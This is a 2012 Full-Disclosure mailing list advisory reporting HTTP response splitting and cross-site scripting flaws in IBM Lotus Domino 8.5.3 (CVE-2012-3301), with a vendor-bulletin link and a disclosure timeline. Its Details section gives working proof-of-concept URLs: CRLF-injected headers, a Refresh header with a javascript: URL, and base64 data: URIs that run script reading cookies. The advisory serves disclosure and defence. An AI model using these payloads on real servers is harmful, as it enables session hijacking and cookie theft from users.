[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Fri, 7 Sep 2012 03:54:27 +0300
Hello list!
I want to warn you about HTTP Response Splitting and Cross-Site Scripting
vulnerabilities in IBM Lotus Domino. At 15th of August IBM released the
advisory concerning these Cross-Site Scripting vulnerabilities.
CVE ID: CVE-2012-3301.
-------------------------
Affected products:
-------------------------
Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These
vulnerabilities will be fixed in Domino 8.5.4 and IBM are still working on
other vulnerabilities, about which I've informed them.
For fixes, workarounds and mitigations reference to IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160
----------
Details:
----------
HTTP Response Splitting (WASC-25):
http://site/servlet/%0AHeader:value%0A1
Cross-Site Scripting (WASC-08):
Will work in different browsers (in case of Mozilla Firefox will work in
versions before Firefox 3.0.9):
http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1
Will work in all versions of Firefox, but without access to cookies:
http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1
Also there can be used Location header for XSS attack (for which there are its
own nuances of work in different browsers).
Cross-Site Scripting (WASC-08):
The attack is possible via data: and vbscript: URI.
http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
In x.nsf, "x" means username of logged in user.
------------
Timeline:
------------
Full timeline read in the first advisory
(http://securityvulns.ru/docs28474.html).
- During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in
IBM software at my site.
- During 16.05-20.05 I've wrote five advisories via contact form at IBM site.
- At 31.05 I've resend five advisories to IBM PSIRT, which they received and
said they would send them to the developers (of Lotus products).
- At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP
Response Splitting holes - just few from total amount of holes).
- At 28.08.2012 I've disclosed these vulnerabilities (second advisory) at my
site (http://websecurity.com.ua/5839/).
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/